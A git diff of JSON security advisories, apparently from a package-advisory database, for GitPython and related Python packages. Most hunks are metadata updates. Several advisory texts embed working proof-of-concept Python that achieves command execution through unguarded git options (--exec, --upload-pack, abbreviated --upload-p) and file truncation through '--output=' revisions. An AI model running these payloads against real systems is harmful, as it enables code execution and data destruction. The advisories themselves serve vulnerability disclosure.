"registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "markdown-it-py", - "subject_version": "4.2.0", - "key": "pkg:pypi/markdown-it-py@4.2.0", - "resource": "markdown-it-py" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-hapless-CVE-2026-4539.json b/advisories/BREW-hapless-CVE-2026-4539.json index 042ea0060e..cae1338bb7 100644 --- a/advisories/BREW-hapless-CVE-2026-4539.json +++ b/advisories/BREW-hapless-CVE-2026-4539.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-hapless-CVE-2026-4539", "published": "2026-08-13T16:55:33Z", - "modified": "2026-08-13T16:55:33Z", + "modified": "2026-09-10T19:24:31Z", "upstream": [ "GHSA-5239-wwwm-4pmq", "CVE-2026-4539", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", - "resource": "pygments" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-legit-CVE-2022-24439.json b/advisories/BREW-legit-CVE-2022-24439.json index 18b901c59f..680441505d 100644 --- a/advisories/BREW-legit-CVE-2022-24439.json +++ b/advisories/BREW-legit-CVE-2022-24439.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-legit-CVE-2022-24439", "published": "2026-08-13T17:02:43Z", - "modified": "2026-09-05T09:11:40Z", + "modified": "2026-09-10T19:41:30Z", "upstream": [ "GHSA-hcpj-qp55-gfph", "CVE-2022-24439", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "gitpython", - "subject_version": "3.1.61", - "key": "pkg:pypi/gitpython@3.1.61", - "resource": "gitpython" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-legit-CVE-2023-40267.json b/advisories/BREW-legit-CVE-2023-40267.json index 8000ebe03e..f98ce0f60f 100644 --- a/advisories/BREW-legit-CVE-2023-40267.json +++ b/advisories/BREW-legit-CVE-2023-40267.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-legit-CVE-2023-40267", "published": "2026-08-13T17:02:43Z", - "modified": "2026-09-05T09:11:40Z", + "modified": "2026-09-10T19:41:30Z", "upstream": [ "GHSA-pr76-5cm5-w9cj", "CVE-2023-40267", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "gitpython", - "subject_version": "3.1.61", - "key": "pkg:pypi/gitpython@3.1.61", - "resource": "gitpython" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-legit-CVE-2023-40590.json b/advisories/BREW-legit-CVE-2023-40590.json index b554d0a0b1..733c7ffce2 100644 --- a/advisories/BREW-legit-CVE-2023-40590.json +++ b/advisories/BREW-legit-CVE-2023-40590.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-legit-CVE-2023-40590", "published": "2026-08-13T17:02:43Z", - "modified": "2026-09-05T09:11:40Z", + "modified": "2026-09-10T19:41:30Z", "upstream": [ "GHSA-wfm5-v35h-vwf4", "CVE-2023-40590", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "gitpython", - "subject_version": "3.1.61", - "key": "pkg:pypi/gitpython@3.1.61", - "resource": "gitpython" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-legit-CVE-2023-41040.json b/advisories/BREW-legit-CVE-2023-41040.json index 9fc09896d7..9adc8eb926 100644 --- a/advisories/BREW-legit-CVE-2023-41040.json +++ b/advisories/BREW-legit-CVE-2023-41040.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-legit-CVE-2023-41040", "published": "2026-08-13T17:02:43Z", - "modified": "2026-09-05T09:11:40Z", + "modified": "2026-09-10T19:41:30Z", "upstream": [ "GHSA-cwvm-v4w8-q58c", "CVE-2023-41040", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "gitpython", - "subject_version": "3.1.61", - "key": "pkg:pypi/gitpython@3.1.61", - "resource": "gitpython" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-legit-CVE-2024-22190.json b/advisories/BREW-legit-CVE-2024-22190.json index 360c3408ef..81a4bd4643 100644 --- a/advisories/BREW-legit-CVE-2024-22190.json +++ b/advisories/BREW-legit-CVE-2024-22190.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-legit-CVE-2024-22190", "published": "2026-08-13T17:02:43Z", - "modified": "2026-09-05T09:11:40Z", + "modified": "2026-09-10T19:40:06Z", "upstream": [ "GHSA-2mqj-m65w-jghx", "CVE-2024-22190", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "gitpython", - "subject_version": "3.1.61", - "key": "pkg:pypi/gitpython@3.1.61", - "resource": "gitpython" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-legit-CVE-2026-42215.json b/advisories/BREW-legit-CVE-2026-42215.json index 99c9196d94..c308aafec3 100644 --- a/advisories/BREW-legit-CVE-2026-42215.json +++ b/advisories/BREW-legit-CVE-2026-42215.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-legit-CVE-2026-42215", "published": "2026-08-13T17:02:43Z", - "modified": "2026-09-05T09:11:40Z", + "modified": "2026-09-10T19:41:30Z", "upstream": [ "GHSA-rpm5-65cw-6hj4", "CVE-2026-42215", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "gitpython", - "subject_version": "3.1.61", - "key": "pkg:pypi/gitpython@3.1.61", - "resource": "gitpython" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-legit-CVE-2026-42284.json b/advisories/BREW-legit-CVE-2026-42284.json index 4445bf3b47..5eac5e9e1b 100644 --- a/advisories/BREW-legit-CVE-2026-42284.json +++ b/advisories/BREW-legit-CVE-2026-42284.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-legit-CVE-2026-42284", "published": "2026-08-13T17:02:43Z", - "modified": "2026-09-05T09:11:40Z", + "modified": "2026-09-10T19:41:30Z", "upstream": [ "GHSA-x2qx-6953-8485", "CVE-2026-42284", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "gitpython", - "subject_version": "3.1.61", - "key": "pkg:pypi/gitpython@3.1.61", - "resource": "gitpython" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-legit-CVE-2026-44243.json b/advisories/BREW-legit-CVE-2026-44243.json index f221e536f3..d3cc0a5678 100644 --- a/advisories/BREW-legit-CVE-2026-44243.json +++ b/advisories/BREW-legit-CVE-2026-44243.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-legit-CVE-2026-44243", "published": "2026-08-13T17:02:43Z", - "modified": "2026-09-05T09:11:40Z", + "modified": "2026-09-10T19:41:30Z", "upstream": [ "GHSA-7545-fcxq-7j24", "CVE-2026-44243", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "gitpython", - "subject_version": "3.1.61", - "key": "pkg:pypi/gitpython@3.1.61", - "resource": "gitpython" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-legit-CVE-2026-44244.json b/advisories/BREW-legit-CVE-2026-44244.json index c880347ecb..99fe4bc84c 100644 --- a/advisories/BREW-legit-CVE-2026-44244.json +++ b/advisories/BREW-legit-CVE-2026-44244.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-legit-CVE-2026-44244", "published": "2026-08-13T17:02:43Z", - "modified": "2026-09-05T09:11:40Z", + "modified": "2026-09-10T19:41:30Z", "upstream": [ "GHSA-v87r-6q3f-2j67", "CVE-2026-44244", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "gitpython", - "subject_version": "3.1.61", - "key": "pkg:pypi/gitpython@3.1.61", - "resource": "gitpython" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-legit-CVE-2026-67322.json b/advisories/BREW-legit-CVE-2026-67322.json index f4e709c875..73de33c81f 100644 --- a/advisories/BREW-legit-CVE-2026-67322.json +++ b/advisories/BREW-legit-CVE-2026-67322.json @@ -2,10 +2,11 @@ "schema_version": "1.7.3", "id": "BREW-legit-CVE-2026-67322", "published": "2026-08-13T17:02:43Z", - "modified": "2026-09-05T09:11:40Z", + "modified": "2026-09-10T19:41:30Z", "upstream": [ "GHSA-rwj8-pgh3-r573", - "CVE-2026-67322" + "CVE-2026-67322", + "PYSEC-2026-3842" ], "affected": [ { @@ -64,6 +65,10 @@ "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-rwj8-pgh3-r573" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-67322" + }, { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/pull/2172" @@ -79,6 +84,10 @@ { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/releases/tag/3.1.52" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/gitpython-before-environment-variable-exfiltration-via-clone-from" } ] } diff --git a/advisories/BREW-legit-CVE-2026-67323.json b/advisories/BREW-legit-CVE-2026-67323.json index 525092cec0..1a2969e882 100644 --- a/advisories/BREW-legit-CVE-2026-67323.json +++ b/advisories/BREW-legit-CVE-2026-67323.json @@ -2,10 +2,11 @@ "schema_version": "1.7.3", "id": "BREW-legit-CVE-2026-67323", "published": "2026-08-13T17:02:43Z", - "modified": "2026-09-05T09:11:40Z", + "modified": "2026-09-10T19:41:30Z", "upstream": [ "GHSA-956x-8gvw-wg5v", - "CVE-2026-67323" + "CVE-2026-67323", + "PYSEC-2026-3839" ], "affected": [ { @@ -52,7 +53,7 @@ ] }, "summary": "GitPython: command injection via unguarded Git options in `Repo.archive()`, `git.ls_remote()`, and arbitrary file overwrite via `Repo.iter_commits()` / `Repo.blame()`", - "details": "## Summary\n\nGitPython spawns the real `git` binary with an argument vector built from caller-supplied values. To prevent argument injection, GitPython maintains denylists of \"unsafe\" Git options (`--upload-pack`, `--receive-pack`, `--exec`, `-c`, `--config`, …) that can be abused to run arbitrary commands, and enforces them with `Git.check_unsafe_options()`.\n\nThat enforcement is only wired into the **network** commands — `clone_from`, `Remote.fetch`, `Remote.pull`, `Remote.push`. Several other public APIs that also forward caller-controlled values into the `git` argv have **no guard at all**:\n\n1. **`Repo.archive(ostream, treeish=None, prefix=None, **kwargs)`** forwards `**kwargs` verbatim into `git archive`. An attacker-influenced options mapping such as `{\"remote\": \".\", \"exec\": \"\"}` becomes `git archive --remote=. --exec= -- `, and `git archive --remote=` invokes `git-upload-archive` whose path is overridden by `--exec` → **arbitrary command execution under default Git configuration** (no `protocol.ext.allow` needed).\n\n2. **`repo.git.ls_remote(, upload_pack=\"\")`** (and the dynamic-command builder generally) turns the `upload_pack` kwarg into `--upload-pack=` with no guard → **arbitrary command execution**.\n\n3. **`Repo.iter_commits(rev)`** and **`Repo.blame(rev, file)`** place the caller's `rev` value into the argv *before* the `--` end-of-options separator and apply no leading-dash check. A benign-looking ref value such as `--output=/path/to/file` is parsed by `git rev-list` / `git blame` as the `--output` option, which **opens and truncates an arbitrary file** before Git even validates the revision → arbitrary file clobber (integrity/availability; can destroy keys, configs, lockfiles, or be aimed at files the host later sources).\n\nThe first two are direct code execution; the third is an arbitrary file-overwrite primitive. All share one root cause: the `check_unsafe_options` / end-of-options discipline that GitPython applies to clone/fetch/pull/push was never extended to these sinks.\n\n## Details\n\nGitPython explicitly recognises these options as command-execution vectors. `git/remote.py:535`:\n\n```python\nunsafe_git_fetch_options = [\n # Arbitrary command execution.\n \"--upload-pack\",\n \"--receive-pack\",\n # Arbitrary file overwrite.\n \"--exec\",\n]\n```\n\nand enforces them via `Git.check_unsafe_options()` (`git/cmd.py:963`):\n\n```python\ndef check_unsafe_options(cls, options, unsafe_options):\n ...\n if unsafe_option is not None:\n raise UnsafeOptionError(f\"{unsafe_option} is not allowed, use `allow_unsafe_options=True` to allow it.\")\n```\n\nBut `check_unsafe_options` is invoked from **only five sites**, all network commands:\n\n```\ngit/remote.py:1071 Remote.fetch\ngit/remote.py:1125 Remote.pull\ngit/remote.py:1198 Remote.push\ngit/repo/base.py:1410 / :1412 Repo.clone_from\n```\n\nThe following sinks call `git` with caller-controlled options/positionals and are **not** guarded:\n\n### 1. `Repo.archive` — command execution (`git/repo/base.py:1623`)\n\n```python\ndef archive(self, ostream, treeish=None, prefix=None, **kwargs):\n ...\n self.git.archive(\"--\", treeish, *path, **kwargs)\n return self\n```\n\n`treeish` and `path` are correctly placed after `--`, but `**kwargs` are converted by `Git.transform_kwarg` (`git/cmd.py:1487`) into `--=` flags and inserted **before** the `--` by `_call_process`, with no `check_unsafe_options`. `Repo.archive` already documents user-facing kwargs (`format`, `prefix`, `path`), so forwarding a caller options mapping is an expected usage. Final argv:\n\n```\ngit archive --remote=. --exec= -- \n```\n\n`git archive --remote=` runs the upload-archive helper; `--exec=` overrides the helper path, executing `` on the host. This works with **default Git config** — it does not rely on the `ext::` transport (which is blocked by default).\n\n### 2. `repo.git.ls_remote(..., upload_pack=...)` — command execution (dynamic builder, `git/cmd.py:1487`)\n\n`transform_kwarg` dashifies `upload_pack` → `--upload-pack=`. `git ls-remote --upload-pack=` executes ``. The dynamic builder makes **both** the flag name and value caller-controlled (`repo.git.(**user_dict)`), and `ls_remote` has no `check_unsafe_options`.\n\nThis is exactly the underscore-kwarg-vs-hyphen-kwarg gap that CVE-2026-42215 fixed for `fetch`/`pull`/`push`/`clone_from` — but `ls_remote` and the rest of the dynamic surface were left unpatched.\n\n### 3. `Repo.iter_commits` / `Repo.blame` — arbitrary file overwrite (`git/objects/commit.py:348`, `git/repo/base.py:1199`)\n\n```python\n# Commit.iter_items (reached via Repo.iter_commits)\nproc = repo.git.rev_list(rev, args_list, as_process=True, **kwargs) # args_list == [\"--\", *paths]\n```\n\n```python\n# Repo.blame\ndata = self.git.blame(rev, *rev_opts, \"--\", file, p=True, stdout_as_string=False, **kwargs)\n```\n\n`rev` is placed **before** `--`, with no leading-dash check anywhere in the path. A caller passing `rev=\"--output=/path\"` (a value that looks like an ordinary ref/branch/tag string an app forwards from user input) produces:\n\n```\ngit rev-list --output=/path --\n```\n\n`git rev-list`/`log`/`blame` honour `--output=`, which `open()`s and truncates the file *before* validating the revision — so the file is destroyed even though Git then errors out on the bad revision.\n\n## PoC\n\nAll three PoCs are self-contained, run against the released **GitPython 3.1.50** under **default Git configuration**, and were executed live (git 2.51.0). Each prints a host-side marker proving the effect.\n\n### Install\n\n```bash\npython3 -m venv venv && . venv/bin/activate\npip install GitPython # resolves to 3.1.50\npython -c \"import git; print(git.__version__)\" # 3.1.50\n```\n\n### PoC 1 — command execution via `Repo.archive`\n\n```python\n# archive_rce.py\nimport io, os, tempfile, subprocess, git\n\nd = tempfile.mkdtemp()\nsubprocess.run(['git','init','-q',d], check=True)\nsubprocess.run(['git','-C',d,'-c','user.email=a@b.c','-c','user.name=a',\n 'commit','-q','--allow-empty','-m','init'], check=True)\nrepo = git.Repo(d)\n\nmarker = os.path.join(tempfile.gettempdir(), 'gp_rce_marker')\nif os.path.exists(marker): os.remove(marker)\n\n# a service lets a user export a repo and forwards their options dict\nopts = {'remote': '.', 'exec': 'touch ' + marker}\ntry:\n repo.archive(io.BytesIO(), **opts)\nexcept git.exc.GitCommandError as e:\n print('[*] git exited non-zero (expected), but the exec already ran:', str(e).splitlines()[0][:60])\n\nprint('[+] marker present:', os.path.exists(marker))\n```\n\nVerbatim output:\n\n```\n[*] git exited non-zero (expected), but the exec already ran: Cmd('git') failed due to: exit code(128)\n[+] marker present: True\n```\n\n`git config --get protocol.ext.allow` returns nothing (unset = default), confirming no special config is required.\n\n### PoC 2 — command execution via `git.ls_remote(upload_pack=...)`\n\n```python\n# lsremote_rce.py\nimport os, tempfile, subprocess, git\nd = tempfile.mkdtemp()\nsubprocess.run(['git','init','-q',d], check=True)\nsubprocess.run(['git','-C',d,'-c','user.email=a@b.c','-c','user.name=a','commit','-q','--allow-empty','-m','init'], check=True)\nrepo = git.Repo(d)\nmarker = os.path.join(tempfile.gettempdir(),'gp_lsr_marker')\nif os.path.exists(marker): os.remove(marker)\ntry:\n repo.git.ls_remote('.', upload_pack='touch '+marker+';')\nexcept git.exc.GitCommandError as e:\n print('[*] git err:', str(e).splitlines()[0][:50])\nprint('[+] ls-remote marker present:', os.path.exists(marker))\n```\n\nVerbatim output:\n\n```\n[*] git err: Cmd('git') failed due to: exit code(128)\n[+] ls-remote marker present: True\n```\n\n### PoC 3 — arbitrary file overwrite via a benign-looking `rev`\n\n```python\n# itercommits_filewrite.py\nimport os, tempfile, subprocess, git\nd = tempfile.mkdtemp()\nsubprocess.run(['git','init','-q',d], check=True)\nsubprocess.run(['git','-C',d,'-c','user.email=a@b.c','-c','user.name=a','commit','-q','--allow-empty','-m','init'], check=True)\nrepo = git.Repo(d)\nvictim = os.path.join(tempfile.gettempdir(),'gp_fw_victim')\nopen(victim,'w').write('do not delete\\n')\nprint('[*] before:', repr(open(victim).read()))\nuser_ref = '--output=' + victim # value an app forwards as a \"ref/branch\"\ntry:\n list(repo.iter_commits(user_ref))\nexcept git.exc.GitCommandError as e:\n print('[*] git err (after open+truncate):', str(e).splitlines()[0][:50])\nprint('[+] after :', repr(open(victim).read()), '<- truncated')\n```\n\nVerbatim output:\n\n```\n[*] before: 'do not delete\\n'\n[*] git err (after open+truncate): Cmd('git') failed due to: exit code(129)\n[+] after : '' <- truncated\n```", + "details": "## Summary\n\nGitPython already know that --upload-pack / --exec are command-exec vectors, they are denylist in\ngit/remote.py:535 and check by Git.check_unsafe_options() (git/cmd.py:963), the thing is this\ncheck him he is only call from fetch, pull, push and clone_from, everything else who build a git\nargv from caller values just go through, no check, three examples\n\n## Code analysis\n\nRepo.archive (git/repo/base.py:1623) do self.git.archive(\"--\", treeish, *path, **kwargs), the\ntreeish is after the --, but the kwargs get dashify by transform_kwarg (git/cmd.py:1487) and\nthey land before it, so {\"remote\": \".\", \"exec\": \"\"} give\ngit archive --remote=. --exec= -- , the --remote spawn the upload-archive helper and\n--exec choose which binary that is, done, default git config, no protocol.ext.allow needed, and\narchive already document caller kwargs (format, prefix, path) so pass a dict is normal usage\n\nrepo.git.ls_remote(url, upload_pack=\"\"), same builder, same result, it's exactly the kwarg\ngap that CVE-2026-42215 close for fetch/pull/push/clone_from, except the dynamic\nrepo.git.(**user_dict) surface him he never got the fix\n\nRepo.iter_commits / Repo.blame (git/objects/commit.py:348, git/repo/base.py:1199) put the rev\nbefore the --, no leading-dash check, a \"branch name\" like --output=/etc/whatever become\ngit rev-list --output=... --, and git he open and truncate that file before he even validate the\nrevision, the file is gone even if the command error right after\n\n## PoC\n\nReleased 3.1.50, git 2.51.0, stock config (`git config --get protocol.ext.allow` returns nothing here).\n\n```\npip install GitPython # 3.1.50\n```\n\nCommon setup for the three:\n\n```python\nimport io, os, tempfile, subprocess, git\nd = tempfile.mkdtemp()\nsubprocess.run(['git','init','-q',d], check=True)\nsubprocess.run(['git','-C',d,'-c','user.email=a@b.c','-c','user.name=a',\n 'commit','-q','--allow-empty','-m','init'], check=True)\nrepo = git.Repo(d)\ntmp = tempfile.gettempdir()\n```\n\n1. exec via archive (a service exports a repo and forwards the user's options dict):\n\n```python\nm = os.path.join(tmp, 'gp_archive_check')\ntry: repo.archive(io.BytesIO(), **{'remote': '.', 'exec': 'touch ' + m})\nexcept git.exc.GitCommandError as e: print('[*]', str(e).splitlines()[0][:55])\nprint('[+] marker present:', os.path.exists(m))\n```\n```\n[*] Cmd('git') failed due to: exit code(128)\n[+] marker present: True\n```\n\n2. exec via ls_remote:\n\n```python\nm = os.path.join(tmp, 'gp_lsremote_check')\ntry: repo.git.ls_remote('.', upload_pack='touch ' + m + ';')\nexcept git.exc.GitCommandError as e: print('[*]', str(e).splitlines()[0][:55])\nprint('[+] marker present:', os.path.exists(m))\n```\n```\n[*] Cmd('git') failed due to: exit code(128)\n[+] marker present: True\n```\n\n3. file clobber via a rev that looks like a ref:\n\n```python\nv = os.path.join(tmp, 'release_notes.txt')\nopen(v,'w').write('do not delete\\n')\nprint('[*] before:', repr(open(v).read()))\ntry: list(repo.iter_commits('--output=' + v))\nexcept git.exc.GitCommandError as e: print('[*]', str(e).splitlines()[0][:55])\nprint('[+] after :', repr(open(v).read()), '<- truncated')\n```\n```\n[*] before: 'do not delete\\n'\n[*] Cmd('git') failed due to: exit code(129)\n[+] after : '' <- truncated\n```", "severity": [ { "type": "CVSS_V3", @@ -64,6 +65,10 @@ "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-956x-8gvw-wg5v" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-67323" + }, { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/pull/2163" @@ -79,6 +84,10 @@ { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/releases/tag/3.1.51" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/gitpython-before-command-injection-via-unguarded-git-options" } ] } diff --git a/advisories/BREW-legit-CVE-2026-67324.json b/advisories/BREW-legit-CVE-2026-67324.json index 372f922cd2..f57a4a74da 100644 --- a/advisories/BREW-legit-CVE-2026-67324.json +++ b/advisories/BREW-legit-CVE-2026-67324.json @@ -2,10 +2,11 @@ "schema_version": "1.7.3", "id": "BREW-legit-CVE-2026-67324", "published": "2026-08-13T17:02:43Z", - "modified": "2026-09-05T09:11:40Z", + "modified": "2026-09-10T19:41:30Z", "upstream": [ "GHSA-v396-v7q4-x2qj", - "CVE-2026-67324" + "CVE-2026-67324", + "PYSEC-2026-3947" ], "affected": [ { diff --git a/advisories/BREW-legit-CVE-2026-67325.json b/advisories/BREW-legit-CVE-2026-67325.json index 4a65c1808a..da835c7cd5 100644 --- a/advisories/BREW-legit-CVE-2026-67325.json +++ b/advisories/BREW-legit-CVE-2026-67325.json @@ -2,10 +2,11 @@ "schema_version": "1.7.3", "id": "BREW-legit-CVE-2026-67325", "published": "2026-08-13T17:02:43Z", - "modified": "2026-09-05T09:11:40Z", + "modified": "2026-09-10T19:40:06Z", "upstream": [ "GHSA-2f96-g7mh-g2hx", - "CVE-2026-67325" + "CVE-2026-67325", + "PYSEC-2026-3836" ], "affected": [ { @@ -52,7 +53,7 @@ ] }, "summary": "GitPython: Command Injection via git long-option prefix abbreviation bypass of CVE-2026-42215 blocklist", - "details": "## Command injection via long-option prefix abbreviation bypassing `check_unsafe_options` (incomplete fix of CVE-2026-42215 / GHSA-rpm5-65cw-6hj4)\n\n**Component:** gitpython-developers/GitPython (PyPI: GitPython)\n**Affected:** all versions carrying the 3.1.47 blocklist fix, through current `main` (verified at commit `20c5e275`, `3.1.50-42`)\n**CWE:** CWE-184 (Incomplete List of Disallowed Inputs) → CWE-78 (OS Command Injection)\n**Severity:** inherits the parent CVE-2026-42215 surface; estimated High, ~8.8 (`AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H`) — final scoring deferred to maintainer/CNA, mirroring the parent.\n**Reporter:** hackkim\n\n### Summary\n\nThe 3.1.47 fix for CVE-2026-42215 blocks dangerous git options (`--upload-pack`, `--config`, `-c`, `-u` for clone; `--upload-pack` for fetch/pull; `--receive-pack`, `--exec` for push) so callers cannot reach command-executing options unless they pass `allow_unsafe_options=True`.\n\nThe fix canonicalizes an option name along **one** axis (underscore→hyphen via `dashify`) and checks it against an **exact-match** dict. It does not account for git's unambiguous long-option prefix abbreviation. Git accepts any unambiguous prefix of a long option (`--upload-p`, `--upload-pa`, `--upload-pac` all resolve to `--upload-pack`). So a kwarg key like `upload_p` canonicalizes to `upload-p`, misses the blocklist dict, and is emitted to git as `--upload-p=` → executed as `--upload-pack=` → command injection, in the default `allow_unsafe_options=False` configuration.\n\n### The asymmetry (root cause)\n\n```python\n# git/cmd.py (commit 20c5e275), lines 948-974\n@classmethod\ndef _canonicalize_option_name(cls, option):\n option_name = option.lstrip(\"-\").split(\"=\", 1)[0]\n option_tokens = option_name.split(None, 1)\n if not option_tokens:\n return \"\"\n return dashify(option_tokens[0]) # only transform: \"_\" -> \"-\"\n\n@classmethod\ndef check_unsafe_options(cls, options, unsafe_options):\n canonical_unsafe_options = {cls._canonicalize_option_name(o): o for o in unsafe_options}\n for option in options:\n unsafe_option = canonical_unsafe_options.get(cls._canonicalize_option_name(option))\n if unsafe_option is not None:\n raise UnsafeOptionError(...)\n```\n\nThe guard normalizes only `_`→`-` and does exact dict membership. Git's CLI parser accepts a broader grammar (prefix abbreviation) than the guard models, so abbreviated keys slip through and reach git as the blocked option.\n\n### Affected code (commit `20c5e275`)\n\n| Location | Role |\n|---|---|\n| `git/cmd.py:948-960` `_canonicalize_option_name` | canonicalizer — no prefix expansion |\n| `git/cmd.py:963-974` `check_unsafe_options` | exact-match dict lookup (the incomplete guard) |\n| `git/cmd.py:1511` `transform_kwarg` | emits `--=` to the CLI |\n| `git/repo/base.py:1411,1413` | clone call sites |\n| `git/remote.py:1074,1128,1201` | fetch / pull / push call sites |\n\n### Bypass keys (verified)\n\n| kwarg key | git resolves to | path | weaponizable |\n|---|---|---|---|\n| `upload_p`, `upload_pac` | `--upload-pack` | clone / fetch / pull | Yes — direct RCE |\n| `receive_p` | `--receive-pack` | push | Yes — direct RCE |\n| `exe` | `--exec` | push | Yes — direct RCE |\n| `conf`, `confi` | `--config` | clone | bypasses option blocklist; RCE needs an additional config vector (see note) |\n\n### Minimal PoC\n\nSelf-contained, no network egress (a local bare repo acts as the \"remote\"). Tested on current `main` (git 2.50.1):\n\n```python\nimport os, stat, tempfile\nfrom git import Repo\n\nwork = tempfile.mkdtemp()\nmarker = os.path.join(work, \"RCE_MARKER\")\n\n# fake \"upload-pack\" program that proves arbitrary command execution\nprog = os.path.join(work, \"evil.sh\")\nwith open(prog, \"w\") as f:\n f.write(f\"#!/bin/sh\\ntouch {marker}\\nexit 1\\n\") # exit 1 so git aborts after our code ran\nos.chmod(prog, os.stat(prog).st_mode | stat.S_IEXEC)\n\nbare = os.path.join(work, \"remote.git\")\nRepo.init(bare, bare=True)\n\n# attacker-controlled kwarg KEY 'upload_p' -> --upload-p= -> git runs \ntry:\n Repo.clone_from(bare, os.path.join(work, \"out\"), upload_p=prog)\nexcept Exception:\n pass # git aborts with GitCommandError AFTER the payload executed\n\nprint(\"RCE marker created:\", os.path.exists(marker)) # True -> command injection confirmed\n```\n\nEquivalent at the shell: `git clone --upload-p=/tmp/evil.sh src out` runs `evil.sh`.\n\nConfirmed behavior:\n- `upload_pack` (exact) → blocked; `upload_p` (abbrev) → passes guard, reaches git, executes. The fix works for the form it models but not the abbreviated form.\n- `allow_unsafe_options=True` opt-out behaves as documented (out of scope).\n\n### Honest scope note\n\nLike the parent CVE, exploitation requires a host application that flows attacker-controlled kwarg **keys** into a GitPython clone/fetch/pull/push. Where the host passes only fixed/validated keys, this is not reachable — the vulnerability is in the library's documented defense-in-depth control (`allow_unsafe_options=False`), which this variant defeats.\n\nOn the `--config` family: `conf` bypasses the option blocklist, but weaponizing `--config protocol.ext.allow=always` via an `ext::` URL is independently blocked by GitPython's protocol allowlist (`allow_unsafe_protocols=False`). The directly weaponizable family is `upload-pack` / `receive-pack` / `exec`. Reported transparently — not claiming Critical.\n\n### Suggested remediation (any one)\n\n1. **Prefix-aware matching:** reject any option whose canonical name is an unambiguous prefix of a blocked option (≈ `startswith` on the blocked canonical name, after `dashify`).\n2. **Disable abbreviation at the sink:** pass `--end-of-options` or invoke git in a way that disables long-option abbreviation.\n3. **Allowlist** option names on security-sensitive subcommands instead of a blocklist.\n\nRemediation should also cover the `-c`/`--config` family abbreviations, even though the `ext::` route is currently gated by the protocol allowlist.", + "details": "## Command injection via long-option prefix abbreviation bypassing `check_unsafe_options` (incomplete fix of CVE-2026-42215 / GHSA-rpm5-65cw-6hj4)\n\n**Component:** gitpython-developers/GitPython (PyPI: GitPython)\n**Affected:** all versions carrying the 3.1.47 blocklist fix, through current `main` (verified at commit `20c5e275`, `3.1.50-42`)\n**Reporter:** hackkim\n\n### Summary\n\nThe 3.1.47 fix for CVE-2026-42215 blocks dangerous git options (`--upload-pack`, `--config`, `-c`, `-u` for clone; `--upload-pack` for fetch/pull; `--receive-pack`, `--exec` for push) so callers cannot reach command-executing options unless they pass `allow_unsafe_options=True`.\n\nThe fix canonicalizes an option name along **one** axis (underscore→hyphen via `dashify`) and checks it against an **exact-match** dict. It does not account for git's unambiguous long-option prefix abbreviation. Git accepts any unambiguous prefix of a long option (`--upload-p`, `--upload-pa`, `--upload-pac` all resolve to `--upload-pack`). So a kwarg key like `upload_p` canonicalizes to `upload-p`, misses the blocklist dict, and is emitted to git as `--upload-p=` → executed as `--upload-pack=` → command injection, in the default `allow_unsafe_options=False` 